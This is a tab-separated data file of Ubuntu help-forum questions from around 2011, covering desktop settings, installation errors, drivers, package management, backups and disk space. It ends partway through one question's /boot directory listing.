84669	removing os from dual boot computer , and recovering hd space .	i have a computer that dual boots linux mint , and ubuntu , i am wondering what the best way would be to remove linux mint , then recovering the hard drive space that is resides in so that ubuntu will be able to access it .
84671	how to add mute/unmute for the sound menu in gnome shell ?	the sound menu in gnome shell have no mute/unmute option . so if the sound is muted i have to open sound settings and unmute it , unlike unity i , e , i want to add a mute/unmute button to gnome shell sound menu , as i need it frequently .
84672	bootable flash drive	i have reinstalled ubuntu 10.04.3 on my laptop and would like to make a bootable flash drive either from netbooks or 11.1 version since my new netbook has built in camera and speaker , however when i use the download procedure from ubuntu page it expects me to use the start up disk which 10.04 does not have . i even tried to get it from link that is provided to no avail . so how do i download this software to my 16 gb flash drive with 7.7 gb free space in order to install it on my netbook please ? english is my second language and am none technical by the way . thank you , sa'ed
84674	is this really the only way to simply put a link to a web page on my desktop ?	after going through many results of a google search on this subject i 've only found this solution : creating a desktop launcher . i 'm using firefox 8.0 on ubuntu 11.10 . please tell me this is over-complicating the process and that there 's an easier/ more direct way !
84676	cant access ccsm or terminal	i installed the atlantis transparent cube plug in and now all i have on my screen are folders and fish . i cant open a terminal with ctr alt t and i cant open the run dialogue box with alt f2 . i also cant get ctr alt f1 to do what i need ( unity -- reset ) . i have tried everything that i can think of and nothing is working . i have been using the computer in guest mode but i cant do this forever , at least i hope not .
84679	why does my opera window not show up in unity ?	so , i got a new computer ( to work on it ) , and installed ubuntu 11.10 on it . as my home computer is not strong enough ( i 'm using some strange mix of xubuntu/ubuntu/kubuntu there ) , this was my first real contact with unity . and somehow ( i do n't really remember how ) i managed to have my favorite browser ( opera ) on the screen , but neither in the side bar ( which , as i understand , should contain icons for all currently running programs , as well as some icons to start more programs ) , nor in the alt+tab window list . the green mark is proof that the browser window in front is really opera , while the yellow marks show how opera is missing in both those lists . closing and restarting opera seems not to help . in this screenshot , i have only opera and two terminal windows ( one out of sight ) , but normally i have enough windows to fill the whole two screens , which makes it a bit difficult to find the opera window if it is obscured . what could have caused this , and how i get my icon back ? ( actually , i 'm considering changing the window manager completely , but i 'll first try to solve this problem and see if i can get used to unity . )
84680	new upstream version of gnome-mplayer . how do i ask for this to be considered for release / commit ?	i have been using gnome-mplayer 1.0.4 with xubuntu 11.10 and it has a number of bugs . i have been reporting these on code.google.com/p/gnome-mplayer/issues/detail ? id=558 anyhow ... the dev says there is a newer version 1.05 with a code rewrite which should fix some . http : //kdekorte.blogspot.com/2011/10/105b1-of-gmtk-gnome-mplayer-and-gecko.html how do i ask for this to be considered for commit into the ubuntu repo 's ( testing ) ? do i just add it here ... https : //bugs.launchpad.net/ubuntu/+source/gnome-mplayer
84682	ca n't update/dont know admin password	my daughter got a computer at a yard sale with an old version of ubuntu . when i try to update , it asks for admin password . it also says version no longer supported .
84698	how do i find the folder/directory that a file is in ( without using find ) ?	with the advent of the dash i can easily open a file which i do not know the location of . how can i find out where the file resides in the directory structure without using `` find '' or `` locate '' or another command line utility ? as far as i can tell , the search utility in nautilus will let me open the file but not open the folder where the file resides . this question is related to the following questions : view the folder of a selected file in the dash and using locate to find a directory
84699	everything opens dolphin file manager windows	every kind of file i open through ubuntu dash or via firefox download window instead of directly open the right application it launches a dolphin window straight to the path of the file and just then the default application is opened . this is very annoying so i decided to unistall dolphin and now when i try to open a file in dash or firefox i got this message `` failed to execute child process `` dolphin '' ( no such file or directory ) . '' i hope i was clear enough as english is not my primary language .
84701	installation fails with `` failed to partition : /cdrom '' error	i am having a problem installing ubuntu 11 , after booting from my usb flash i get an error saing `` failed to partition : /cdrom '' , if i press continue the instalation gets stuck in detecting system files , i tried to boot from a cd rom but the problem persists . is this a common error ? any solution ?
84702	what is the *right* way to use gnome-shell integrated chat ?	please bear with me as i am still figuring out how to use gnome-shell . my question concerns how to use the integrated chat correctly . i have the following questions : 1 ) when people chat with me , it pops up as a notification on the hidden bar at the bottom of the screen , and then that chat stays there so i can access it later . how do i initiate a chat in this manner , without opening an empathy window ? what i have been doing is hitting super key typing in the person 's name , which brings up contacts initiate the chat using empathy immediately close the chat window when the person responds , it comes through as a notification . i then proceed to interact with the chat this way . 2 ) what is the keyboard shortcut for bringing up the notifications bar ? ideally , i would like to have the following experience use some keyboard shortcut to bring up notifications begin typing the name of the notification that i wish to investigate , and have the matching work in a fuzzy manner , much like ido mode 's buffer switching matching in emacs when then right name is matched , i hit enter and then bring up the chat with that person as that popup notification . are these behaviours supported ? if not , i would be happy to work on implementing them . i am an experienced programmer , but not familiar with gnome-shell . if someone would point me in the right direction in terms of if this behaviour is supported , or where in the gnome-shell framework would i add to to get this behaviour , i would really appreciate it . thanks !
84707	how do i fix a `` [ error 30 ] read-only file system '' when trying to install ?	please , i would like to know how to fix this problem in order to install ubuntu 11.04 again . [ error 30 ] read-only file system : '/target/boot/vmlinuz-2.6.38-8-generic'
84709	is there a way in ubuntu 11.10 to configure the `` mouse-on-edges '' effects ?	in ubuntu 10.10 with simple compiz i has a configuration to show the desktop , or show all open windows , when the mouse cursor go to an edge . now , how can i do it with ubuntu 11.10 ? the configuration screen i 'm looking for is like the following ( got the image from an explanation for ubuntu 10 ) : my compizconfig screen do n't look to have this option also :
84710	how can i restore media apps , internet apps , more apps , find file part of unity dash ?	people , this happened on ubuntu 11.04 , and ubuntu 11.10 in twice i have reinstalled ubuntu , unity , gdm , lighdm and etc ... sometimes is and process with i close with the options to search in the unity dock just disappeared , options that disappeared is : app internet , more app , app midia . what i do to arrive that back ?
84717	where can i find the meaning of `` ro '' ?	i 'm having trouble booting my netbook so i 'm looking at the grub boot parameters . i know what splash , quite and vt.handoff=7 do . however i ca n't find any documentation anywhere about what ro does and why it 's there , even though it appears in most examples of grub start up code . where can i find documentation about ro ? i assume it means read only . though docs would ease my mind .
84723	how to remove all associated files and configuration settings of an app installed through 'force architecture ' command	a few weeks ago i installed a 32 bit .deb file through the 'force architecture ' command ( on my 64bit notebook ) , however the procedure was unsuccessful and i used the apt-get purgecommand to uninstall the app . it seems there are some leftovers of the app i uninstalled which has now broken system update . synaptic recommended a sudo apt-get install -fwhich i did in the terminal with this initial response : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libntfs10 use 'apt-get autoremove ' to remove them . the following packages will be removed : crossplatformui 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? i chose 'y ' then got this response : ( reading database ... 187616 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it seems the app i installed crossplatformuiis still on my system and has caused update manager to stop running with a partial upgrade warning . what do i do now ?
84728	how can i merge rear and front audio outputs in one ?	i have ubuntu 11.10 amd64 when i plug headphones into the front audio output - rear output stops working . i had same problem on win7 , but it 's easy solved by merging rear and front output in one in realtek driver settings . how can i do it in ubuntu 11.10 ?
84730	will i be able to switch between desktop enviroments if i install gnome shell ?	if i install the gnome desktop will i be stuck with it or will i be able to switch back and forth between unity and gnome ? ( running 11.10 32bit )
84732	ubuntu custom live cd autostart graphical application	i 'm trying to build a customized ubuntu live cd which should automatically run a graphical application on startup . it should behave like the standard ubuntu live cd , which loads the graphical environment and then shows the first screen where it asks you if you want to run ubuntu or install it . i managed to create a customized version of the live cd which also holds my application , but i ca n't figure out at what point ( in what script ) during startup i should launch my application , and how to disable the screen shown by ubuntu . basically it should assume that i want to always run ubuntu ( never install it ) , and go directly to my graphical application . i looked at the scripts from the ubuntu live cd , but i ca n't figure out where i need to change them . any pointers are welcome . also , in general , any pointer is welcome towards documentation about the steps performed by the ubuntu live cd during startup . for example where in the process is the ubiquity installer launched ?
84737	how should i present a slideshow consisting of pdfs ?	i need to present a slideshow on a projector . i know that if i use openoffice it can send a seperate image to the laptop screen and the projector . if i have some other application ( like a pdf viewer ) being used to view the slideshow , how can i make the presentation display on both the screen and the projector ?
84738	installer crashed leaving only a blank screen	my 11.10 install from live cd onto lenovo thinkpad ( refurbished ) got almost all the way through ( i 'd picked 'install ' not 'try ' ) , then it told me the installer crashed and suggested solutions . the dialog box then popped up over and over again until finally i shut the power off . i have no other operating system installed so options are limited . what happens now : i put in the cd , press power , computer powers up , the screen is black , eventually with a flashing cursor top left ( sometimes shows the thinkpad splash screen for a few seconds first ) . this does not change no matter how long i wait . if i power up and press f12 for bios and select boot from cd , still nothing happens . i have tried : making sure laptop is cool checking hardware requirements - ibm 2.2ghz , 2048mb , 100gb . i am not sure about the graphics card but i am guessing nvidia quadro nvs 140m ( nvidia nb8m-gs ) or quadro fx 570m ( nvidia nb8p-gl ) burning a new cd and trying it on another laptop ( cd worked fine ) made sure it is the 32bit iso installing from a usb stick burning alt-install cds for 11.10 and 10.03 an 8.04 livecd from the library changing out the dvd/cd drive for an identical one in my old thinkpad ( not 100 % sure that drive is ok either though , because that laptop is not working either . i think that 's a graphics or screen issue though ) installing debian 'netinst ' just so i can get in there , but the exact same thing happens - black screen , white cursor . i am a new ubuntu user . i have been getting very good help on ubuntu forums , but time is running out - i will only have this borrowed computer for a little while longer , so i am asking here to - more heads the better ! thank you so much for reading this far .
84740	how to configure vim to start automatically when my pc boots ?	my copy of vim has many plugins installed : ruby , php , python etc . when i invoke vim from the terminal , i have to wait ~ 10 seconds before vim finishes starting . is it possible to have it load when ubuntu starts ?
84744	launcher does not pop out a running app when dragging a file to it	i have a small screen so prefer working with only one visible app at a time . in 11.04 , i could drag a file from nautilus to the launcher , hover above another app , like chromium or gedit . the launcher would then pop out the hovered app and give me an option to select the sub-app to drop the file at . in 11.10 it is not longer working . is there a setting i need to change ? edit : there is an option to drop the file on gedit and nautilus ( even works ) but they 're the only ones highlighted . in 11.04 , i could do it with any app , like dropping to chromium ( gmail page ) . drag and drop to gmail is a great feature i use a lot .
84753	what is the easiest way to install postgis ?	what is the easiest way to install postgis on ubuntu server 11.10 ? apt-get install ...
84754	after successfully booting w/out install from usb , how to access the same usb ?	edit : so , i want to boot linux on school computers but that also means i ca n't install on these computers so i want to run it from my usb . while running ubuntu , my usb that i am booting from is not visible . i hope this is clearer : ) i appreciate the help , thanks !
84757	slow video with an ati x1300	ive got an ati x1300 with its drives installed , but when i see videos un youtube ( sd or hd ) they see slow , and chopped . what could be the problem ?
84761	ibus indicator missing in 11.10	i installed ibus on 11.10 and initially there was an indicator icon in the unity panel . after a reboot , however , the indicator icon disappeared . i tried to purge and reinstall ibus to no avail . then i whitelisted ibus and restarted unity . that brought up an icon , but it is large and ugly and does n't fit with my icon theme -- it is definitely not the same icon i had before . how can i restore the original ibus icon ?
84762	how do i configure postgis	postgis has been installed on ubuntu server 11.10 ... now how do i create a database , admin user , etc.. where does it get installed ls -l /etc/ ... ?
84763	encrypted backups on a nfs or sshfs share	been going around in square circles here so any help and/or suggestions welcome ! goal : encrypt my backup data on shared network server ( shared via nfs or sshfs ) want the encrypted folder to be transparent to my local machine , i.e work as a normal mounted nfs or sshfs folder would . this is so that i can keep using `` backintime '' as a backup tool . it does everything i need except encryption . the encrypted folder should be mounted automatically on login . e.g . same as encrypted private directory . for unattended backups some notes my home directory is already encrypted , but i do n't just want to copy over the encrypted files because then i wo n't have any useful version'ing on them . tried to use encfs and also cryptkeeper . using local folders works fine but when trying to set-up the encrypted folder on the nfs share it fails . running ubuntu lucid , 10.04 i 'd like to set this up on all clients on the local network to backup to the same local networked server which is also running lucid 10.04 . thanks in advance .
84765	triple monitor setup with nvidia and compiz	i have a triple monitor setup with two video cards on ubuntu 10.04 . i have the monitors and graphics cards currently setup as follows : nvidia geforce 210 # 1 - > 1920x1080 monitor ( twinview ) [ center - monitor # 1 ] - > 1920x1080 monitor ( twinview ) [ right - monitor # 2 ] nvidia geforce 210 # 2 - > 1920x1080 monitor ( separate x screen ) [ left - monitor # 3 ] this works fine , except when i open a program , it shows up in between monitor # 1 and # 2 - meaning i have to drag it to one screen before i can use the window . gnome2 's gnome-panel also does not work on the twinview setup ; it spans between both monitors , but it does not redraw ( ex : the clock never changes ) . in addition , when i maximize an application , it spans both monitors , which is not acceptable . when i enable xinerama for my setup , gnome-panel no longer spans two monitors , and applications maximize as expected , but compiz does not work , as x11 compositing is not available . the lack of desktop compositing causes problems with dragging windows between screens ( redraws take forever ) . is there anything i can do to fix these issues without opting for different graphics cards ?
84769	how to delete specific files from terminal	recently , i converted my music files to a different format . i have for example a folder of an artist containing the different albums in separate folders . i would knowing if is there a way to delete *.mp3 files in all my album folders of an artist using a simple command ? for example , if i use ~music/artist_a/album1 $ rm *.mp3 it delete all the mp3 files of only the folder album1 , but i want to use a command that delete all the mp3 's of album1 , album2 , ... in the artist_a folder . thanks !
84771	middle click with a three finger touchpad tap on 11.10 , how can i restore this ?	synaptic touchpads used to support a three finger tap for middle clicking in ubuntu 10.10 ( same as clicking the scroll wheel on a mouse . ) this critical functionality is broken in ubuntu 11.10 how can i restore middle clicking on a touchpad ?
84774	why is there 'amd ' in the ubuntu iso filename ?	if you download iso file with ubuntu you will get something like this : ubuntu-10.04.3-server-amd64.iso ubuntu-11.10-desktop-amd64.iso every part in the file name is pretty clean to me , except 'amd ' . so i have the following questions . why is there the 'amd ' string in the filename ? what other kind of strings in the filename can be found instead of 'amd ' ?
84776	how can i make the battery icon appear in my gnome-3 panel only when charging or discharging ?	i am using ubuntu 11.10 . there was an option for the same in 11.04 . i found a suggestion listed here . unfortunately , it does'nt work . $ gsettings_backend=dconf gsettings set org.gnome.power-manager icon-policy charge no such key 'icon-policy'
84777	need to use a umax astra 4100 usb scanner	i a newbie to linux . i cant seem to use my usb scanner which is a umax astra 4100 model . the scanner wont detect . i poked around a lot on the net and ran this command in terminal sudo sane-find-scanner i got the following message found usb scanner ( vendor=0x0461 [ primax ] , product=0x038c [ usb scanner ] , chip=gl646_hp ) at libusb:003:007 i dont know how to proceed from here . please help .
84779	ubuntu randomly slows to a crawl for no reason	this is a very strange problem . my installation of 11.10 will randomly slow to a crawl , giving the feeling of either max cpu/mem useage , when they are both at normal levels . although there seems to be no pattern , it will happen when i am away from the computer for a while , but it will sometimes happen when i 'm watching a long movie or something . it is very annoying , since the only way i can get rid of it 's slow performance is to log out , but sometimes even the log in screen feels laggy . please help , thank you very much !
84781	iptables resets when server reboots	everytime my server reboots it seems i have to reset my iptables to default , i used to use firestarter but removed it a while ago . is there any settings that are making iptables change when the server reboots ?
84785	how to convert ogg to aac music format ?	i want to convert a ogg file to aac . but i need to transfer all the data of the ogg file ( i.e . album , year , cover , ... ) to the aac file using a shell comand . thanks !
84786	where can i download intel hd vga driver for my dell inspiron n5010 ?	i have a dell inspiron n5010 core i3 with intel hd vga i 'm running ubuntu 11.10 , i want to download and install the vga driver , i used the update manager but it did n't update my driver
84788	create deb repository with several versions of the same package	i want to create my own deb repository to store some packages . i 've tried reprepro and it works fine , except for one fundamental feature . reprepro can't store several versions of the same package in the repository . the ability to store several versions of the same package is essential to me , so i 'm asking what software can can do this . here is a piece of reprepro faq that shows that it ca n't do it : 3.1 ) can i have two versions of a package in the same distribution ? -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - sorry , this is not possible right now , as reprepro heavily optimizes at only having one version of a package in a suite-type-component-architecture quadruple . you can have different versions in different architectures and/or components within the same suite . ( even different versions of a architecture all package in different architectures of the same suite ) . but within the same architecture and the same component of a distribution it is not possible .
84793	resolution not set right on a fresh installation	just intalled ubuntu on the first time ! there is a problem though with the resolution . i need the resolution to be 1280x980 however ubuntu only lets it set to 1280x720 , plus it says my monitor is unknown . i have installed the latest nvidia 7800 gtx drivers using additional drivers function . also no luck with messing with the xrandr function on the terminal . any ideas ?
84798	file sync between multiple drives and computers	since i have left windows , i am looking for a software that will replace viceversa . i need something that is highly recommended for file syncing among the linux / ubuntu users as i am new to this area . what do you recommend ? which is the best ? i read about one called rsync and another called conduit . if possible i would also like a tool that would have gui interface , and once i get more familiar with linux a command line sync utility would also be good . main goal is to backup everything local , nothing on line , but all backups that are local will be to external disks and syncing between computers . another feature would be able to see a preview of what is ready to be backed up / synced before it actually executes the operation . thanks ...
84801	websites take a long time to load	websites in ubuntu take a very long time to load . in windows , it all works fine . the download speed is normal . here 's a video capture to show what i mean .
84802	where can i find computers that has a 100 % support of ubuntu ?	i want to buy a new computer but i want to know which computers will work without any issues with ubuntu ? i want to make a safe buy and not have to google up any possible fixes , i want everything to just work .
84810	formatting hard drive before installing ubuntu & some	i 'm thinking of installing ubuntu ( for the first time ) on my internal hard drive to run as a primary os on my acer aspire . want to format my hard drive altogether and either run ubuntu solely or alongside freshly reinstalled windows 7 ( it 's that time again - windows is all bugged down ) . got a few questions though . 1 . i 've read that on installation of ubuntu we get an option of '' use entire disk '' - will this erase all the info on my hard drive ( like formatting in dos ) ? 2 . my windows installation files are pre-loaded on my hard drive . if i decide to go back to windows ( ca n't think of a reason why , but just in case : ) will i still have windows installation files if i use the option `` use entire disk '' installation for ubuntu or is it safer to reinstall windows ( even though i wo n't be using it ) and then run ubuntu along side it ? 3 . i 'm currently using 64 bit windows 7 . should i install 64 bit ubuntu ? i 'm planning to use the latest 11.10 version of ubuntu . thanks for all your answers in advance . vidrom
84811	installed ubuntu 11.10 alongside windows 7 - getting grub > menu on boot	so , i installed ubuntu alongside windows 7 just now , on my girlfriend 's laptop . i used a usb stick and followed all the default options , choosing a partition size of 32gb for ubuntu 11.10 . after installation completed , the machine rebooted and now all i 'm left with is a command prompt like this : grub > i was expecting a boot menu rather than this , and i 've idea how to proceed . hoping someone can help . thanks .
84826	who to contact about an outdated application in the software center ?	sometimes applications in the software center are outdated and several years old . for instance the version of qtgain is several years old . who should i contact to report this ?
84829	display problem on an acer 7700gx	i have just put ubuntu onto an old acer 7700gx . it all looks lovely for a few minutes but then the desktop background goes blocky and the text goes a bit crazy . this does n't seem to affect new windows that i open though . i guess its a driver thing . any tips ?
84831	removing popularity-contest without trashing the system ?	i do want to uninstall the `` popularity-contest '' package from my system . while i know that i can disable it with $ dpkg-reconfigure popularity-contest it is still a package i want removed . unfortunately , the `` ubuntu-standard '' package depends on it ( instead of just having it recommended ) . removing popcon would thus remove ubuntu-standard , and my system would be trashed . see popularity contest should be uninstallable for the features request to make it uninstallable . until that bug is fixed , i need a way to get it uninstalled . how can i do that ? is there a trick to convince the package manager that the dependency is not necessary ?
84837	how can i update a specific program ?	i want to update only my google-chrome in ubuntu , what is the command to do it ?
84838	gui for setfacl or other ntfs equivalents ?	i would like to setup a small office network based on ubuntu machines to replace the current based on windows . one of the requirements is to setup a samba share for file sharing . the problem is that unix permission system of user-group-others is n't granular enough to offer same functionality as ntfs permissions . i had a look around and found setfacl which looks like it could do the job in terms of replacing ntfs , however i do n't want to have to setup the permissions manually via the cli . q1 : is there a gui for setfacl ? q2 : are there alternatives to setfacl to offer similar functionality as ntfs also equiped with a gui ?
84847	how to disable nautilus from handling the desktop ?	as it is the only way to activate transparent themes in gnome-shell : how to disable nautilus from handling the desktop ? can i make it handle the desktop again ? what will happen to the unity and desktop icons ? how to handle the desktop icons without nautilus ?
84850	i am running 11.10 and want to know if this means i have usb 3.0	does the following mean i have usb 3.0 on my pc ? *-usb:0 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 ***version : 03*** width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport:40e0 ( size=32 ) *-usb:1 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 03 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport:40c0 ( size=32 ) *-usb:2 description : usb controller product : 82801i ( ich9 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 03 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:19 memory : d4505c00-d4505fff
84852	how does one install nx server or freenx on 11.10 ?	i know that this has been asked quite a bit thus far , but i ca n't find any solutions in the previous posts ! having installed ubuntu server 11.10 and ssh , i think i 've installed nx server free , as i just could not get freenx to work . the trouble is that i now get the following error messages when i try and connect with the client ; xsession : unable to launch `` gnome-session '' x session -- - `` gnome-session '' not found ; falling back to default session . xsession : unable to start x session -- - no `` /home/james/.xsession '' file , no '' /home/james/.xsession '' file , no session managers , no window managers , and no terminal emulators found ; aborting . trouble is , nx server free is n't really going to work in the long run for me as i need more than two connections at once , so i really need freenx . any ideas ?
84853	'windowsbackend ' object has no atribute 'iso_path ' error when installing from cd	i start installing ubuntu 11.10 from cd to have dual boot with windows 7 and 10 seconds before end i get message : an error occured : 'windowsbackend ' object has no atribute 'iso_path' for more information , please see the log file ... . i use hp laptop probook 4710s .
84854	are textlive-xxx-doc packages required for installing lyx ?	whenever i install lyx using sudo apt-get install lyx , then i find packages like texlive-fonts-recommended-doc , texlive-latex-base-doc , texlive-latex-extra-doc , etc . among the dependencies . some of these files are huge ( texlive-latex-extra-doc is 190mb ) , and they all seem to be documentation files . do i really need to install these for using lyx ? if not , then how do i avoid it ?
84861	how to get the `` new launcher '' -wizard back into my context-menu ?	i wanted to create a new launcher , but when rightclick and new file , it says that there are no templates . in unable to create new launcher was mentioned , that it should help to install gnome-panel . this package was already installed , so i removed it and all of it dependencies inclusive their settings and reinstalled . but nothing helped . there are no templates and i cant create a new launcher with a rightclick on my desktop . but i like to use the `` new launcher '' -wizard i was used from 11.04 and before ...
84867	why is cd/dvd tray not opening ?	when i press the button on the dvd player , it does n't open . if i press it during the boot ( before starting ubuntu ) , it opens fine . so , what i have to do to eject the dvd ?
84871	lxde on a virtual machine refuses to log me in , what can i do ?	the system boots and shows login screen as usual , but after i type the password and hit enter it throws login screen again . it 's a vm , so i do n't even have grub to login without gui . anything i can do to login ?
84875	shader3 not enabled error in eve online crucible	i 'm a complete noob at this , and have been trying everything to run eve online within ubuntu 11.10 . i have installed through winetricks no problem , and have enabled the virtual windows desktop within winetricks . my problem is that after the splash screen for eve , i get an error message telling me that shader 3 is not enabled . i have an old geforce 7300le , but it does support shader 3 . i have also tried a few different drivers with no luck . i have tried looking within the nvidia x setting , but ca n't find anything . running eve on windows 7 is the only reason i 'm still using windows , so any help to run it on ubuntu would be very appreciated , as i 'm pulling my hair out trying to figure out something which should be simple .
84876	avertv hybrid+fm pci	i get card avertv hybrid+fm pci and my old computer died and i move this card the old computer to new computer . in new computer is ubuntu 11.10 , i ca n't work this card , i looking for help in to internet but in the articles describe steps to old distro . the website of avermedia there are drivers to mandriva and fedora but there are n't drives to ubuntu . i do n't know to do ! ! thanks
84877	lenovo ideapad linux compatibility	does anybody know if the lenovo ideapad v570-1066aju laptop is ubuntu compatible ? it has terrific specs ( i5 , 6gb , 750gb hd , hdmi and good-looking screen ) for the 600 $ price , but i want to make sure it will be ok with the latest ubuntu version . thanks ! edit ( december 24th ) : i 've bought it and managed to get by . see my own answer below .
84878	how to change quickly 's editor ?	i 've just downloaded ninja ide and i really like it 's interface . is there a way to configure the quickly app to launch my project in ninja ide when i type quickly edit ?
84880	how can i make alt + tab browse through all my windows without grouping them ?	using 11.10 . when i use alt+tab to cycle through my apps i would like to have icons for all my open browsers . i use the ` ( grave ) but i really find that hard to use . anyway i can just use alt+tab only ?
84886	bluetooth icon disappeared	after installing cairo-dock , the bluetooth indicator disappeared when i restarted my laptop . bluetooth is working fine . but the bluetooth-indicator at top left of the panel is not showing up anymore . i have to go to system settings > bluetooth to add/remove bluetooth devices . how to bring back the bluetooth indicator ? /etc/xdg/autostart/bluetooth-applet.desktop and /etc/xdg/autostart/bluetooth-applet-unity.desktop exist
84889	how do i configure display link with my macbook pro ?	i wondering if someone can help me configure my displaylink usb adapter to work with my macbook pro . so far all it does is display the green screen but if i try to configure the xorg.conf file it turns everthing off and i have to boot to a command line and edit the xorg.conf back to the default . i have followed all of directions but nothing works i am in need of help . below is my default xorg.conf file . i have the macbook docked with an apple cinema display 20 '' running off the mini displayport another apple cinema display 20 '' is connected to the displaylink usb adapter . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` mouse0 '' # driver `` mouse '' # option `` protocol '' `` auto '' # option `` device '' `` /dev/psaux '' # option `` emulate3buttons '' `` no '' # option `` zaxismapping '' `` 4 5 '' # endsection # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` keyboard0 '' # driver `` kbd '' # endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` apple cinemadisplay '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` apple cinemadisplay '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' # horizsync source : edid , vertrefresh source : edid endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 option `` xinerama '' `` 0 '' # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # inputdevice `` keyboard0 '' `` corekeyboard '' # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # inputdevice `` mouse0 '' `` corepointer '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9400m '' option `` nologo '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9400m '' busid `` pci:2:0:0 '' screen 1 endsection
84890	how to cleanup entries in openwith list ?	i was playing around with wine and i have installed and uninstalled windows software many times . when i open `` open with application '' i get many entries of a same application , is there any way to cleanup this list ?
84894	how can i import video from my jvc everio hdd video camera to 11.10 ?	what is the best method for importing video from my jvc everio hdd video camera into ubuntu 11.10 ?
84895	what are the disadvantages of adding the repositories from 11.04 to 11.10 ?	the reason i 'm doing this is to have sun 's java 6 installed ( getting updates , etc . ) in 11.10 sun 's java was removed from the partner repository . what do you think are the potential disadvantages ?
84897	how can i prevent zeitgeist from reading clipboard ?	when i copy id/password to clipboard , only password is copied , because zeitgeist catches id from gpass as if i were pressing ctrl v. is it possible to avoid ? activity log manager seems to not help in this case . activity logging is stopped , but clipboard is read anyway .
84899	how can i run simultaneously two different firefox profiles	in ( k ) ubuntu , how can i run more than one firefox profile simultaneously ? i need this to run different websites with different extensions .
84903	how do i figure out how to run applications in wine ?	i want to run a windows application in ubuntu using wine . however , from past experience i know that this can be a frustrating , difficult process because of wine and hardware bugs . what is the best , canonical way to troubleshoot problems i encounter trying to install and run a given application ?
84906	how to free up space on /boot ?	i logged onto my server today to find the message : = > /boot is using 98.9 % of 91mb when i look at /boot i see that it is indeed very low on space , and has old-kernel files in it : phrogz @ planar : ~ $ df -h /boot filesystem size used avail use % mounted on /dev/sda1 92m 54m 33m 63 % /boot phrogz @ planar : ~ $ la /boot total 81880 drwxr-xr-x 4 root root 3072 2011-12-02 06:26 ./ drwxr-xr-x 22 root root 4096 2011-09-29 06:37 ../ -rw-r -- r -- 1 root root 646419 2011-03-01 19:02 abi-2.6.32-30-server -rw-r -- r -- 1 root root 646419 2011-04-08 17:07 abi-2.6.32-31-server -rw-r -- r -- 1 root root 646454 2011-04-20 16:53 abi-2.6.32-32-server -rw-r -- r -- 1 root root 646454 2011-07-29 16:07 abi-2.6.32-33-server -rw-r -- r -- 1 root root 646710 2011-09-13 18:00 abi-2.6.32-34-server -rw-r -- r -- 1 root root 646820 2011-10-11 11:10 abi-2.6.32-35-server -rw-r -- r -- 1 root root 110687 2011-03-01 19:02 config-2.6.32-30-server -rw-r -- r -- 1 root root 110676 2011-04-08 17:07 config-2.6.32-31-server -rw-r -- r -- 1 root root 110687 2011-04-20 16:53 config-2.6.32-32-server -rw-r -- r -- 1 root root 110687 2011-07-29 16:07 config-2.6.32-33-server -rw-r -- r -- 1 root root 110687 2011-09-13 18:00 config-2.6.32-34-server -rw-r -- r -- 1 root root 110687 2011-10-11 11:10 config-2.6.32-35-server drwxr-xr-x 3 root root 6144 2011-12-02 06:26 grub/ -rw-r -- r -- 1 root root 8258196 2011-05-18 11:58 initrd.img-2.6.32-30-server -rw-r -- r -- 1 root root 8259568 2011-05-23 20:24 initrd.img-2.6.32-31-server -rw-r -- r -- 1 root root 8257374 2011-05-30 07:47 initrd.img-2.6.32-32-server -rw-r -- r -- 1 root root 8287489 2011-08-10 06:37 initrd.img-2.6.32-33-server -rw-r -- r -- 1 root root 